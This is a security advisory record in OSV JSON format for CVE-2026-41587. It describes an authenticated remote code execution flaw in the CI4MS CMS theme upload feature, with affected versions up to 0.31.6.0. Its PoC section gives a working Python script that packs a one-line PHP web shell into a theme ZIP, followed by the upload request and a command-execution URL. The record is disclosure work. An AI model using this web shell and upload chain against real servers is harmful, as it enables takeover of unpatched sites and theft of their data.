{"id":"GHSA-fw49-9xq4-gmx6","summary":"CI4MS has Unrestricted PHP File Upload via Theme Installation that Leads to Authenticated Remote Code Execution","details":"### Summary\nA theme upload feature allows any authenticated backend user with theme-upload permission to achieve remote code execution (RCE) by uploading a crafted ZIP file. PHP files inside the ZIP are installed into the web-accessible public/ directory with no extension or content filtering, making them directly executable via HTTP.\n\n\n### Details\nFile: `modules/Theme/Controllers/Theme.php`\n\nAfter a ZIP is uploaded and extracted to a temporary directory, install_theme_from_tmp() is called unconditionally: Theme.php:51-52\n\nFile: `modules/Theme/Helpers/themes_helper.php`\n\nThe helper copies every file matching *.* from `public/templates/\u003cname\u003e/` inside the ZIP directly into `public/templates/\u003cname\u003e/` on disk using rename(), with no file-extension allowlist, no MIME check, and no content inspection: `themes_helper.php:60-68`\n\nBecause the web root is `public/`, any `.php` file placed there is directly reachable over HTTP.\n\nPHP files are also installed — without filtering — into app/Controllers/templates/\u003cname\u003e/, app/Libraries/templates/\u003cname\u003e/, and other app/ subdirectories: `themes_helper.php:31-42`\n\nThe theme name is derived from the uploaded filename via `str_replace('_theme.zip', '', $file-\u003egetName())`, so uploading `evil_theme.zip` sets the theme name to evil and the install target to `public/templates/evil/`: `Theme.php:20`\n\n### PoC\nPrerequisites: A backend account with theme upload permission (e.g., backend/themes/upload).\n\nStep 1 — Build the malicious ZIP:\n```\nimport zipfile, io  \n  \nbuf = io.BytesIO()  \nwith zipfile.ZipFile(buf, 'w') as z:  \n    z.writestr('public/templates/evil/shell.php', '\u003c?php system($_GET[\"c\"]); ?\u003e')  \nbuf.seek(0)  \nwith open('evil_theme.zip', 'wb') as f:  \n    f.write(buf.read())\n```\nStep 2 — Upload:\n```\nPOST /backend/themes/upload  \nContent-Type: multipart/form-data  \n  \nfield name: theme  \nfile:       evil_theme.zip  \n```\nStep 3 — Execute:\n```\nGET https://target.com/templates/evil/shell.php?c=id  \n```\nExpected response: output of id (e.g., uid=33(www-data) gid=33(www-data) groups=33(www-data)).\n\n\n### Impact\nType: Authenticated Remote Code Execution (RCE) via arbitrary file write to the web root.\n\nWho is impacted: Any deployment where a backend user has been granted theme upload permission. A superadmin already has full access, but any lower-privileged role granted this permission can use it to write and execute arbitrary PHP on the server, gaining OS-level command execution under the web server process. This can be used for data exfiltration, lateral movement, persistence, or full server compromise.","aliases":["CVE-2026-41587"],"modified":"2026-05-08T20:05:52.627188Z","published":"2026-04-29T20:42:44Z","database_specific":{"nvd_published_at":"2026-05-07T04:16:27Z","cwe_ids":["CWE-434"],"severity":"HIGH","github_reviewed":true,"github_reviewed_at":"2026-04-29T20:42:44Z"},"references":[{"type":"WEB","url":"https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-fw49-9xq4-gmx6"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41587"},{"type":"WEB","url":"https://github.com/ci4-cms-erp/ci4ms/commit/b969465e71eacd9eb57014ad1fce1fc34fa7bca0"},{"type":"PACKAGE","url":"https://github.com/ci4-cms-erp/ci4ms"}],"affected":[{"package":{"name":"ci4-cms-erp/ci4ms","ecosystem":"Packagist","purl":"pkg:composer/ci4-cms-erp/ci4ms"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"0.26.0.0"},{"fixed":"0.31.7.0"}]}],"versions":["0.26.0.0","0.26.1.0","0.26.2.0","0.26.3.0","0.26.3.1","0.26.3.2","0.26.3.3","0.26.3.4","0.27.0.0","0.28.0.0","0.28.3.0","0.28.4.0","0.28.5.0","0.28.6.0","0.31.0.0","0.31.1.0","0.31.2.0","0.31.3.0","0.31.4.0","0.31.5.0","0.31.6.0"],"database_specific":{"last_known_affected_version_range":"\u003c= 0.31.6.0","source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/04/GHSA-fw49-9xq4-gmx6/GHSA-fw49-9xq4-gmx6.json"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V4","score":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"}]}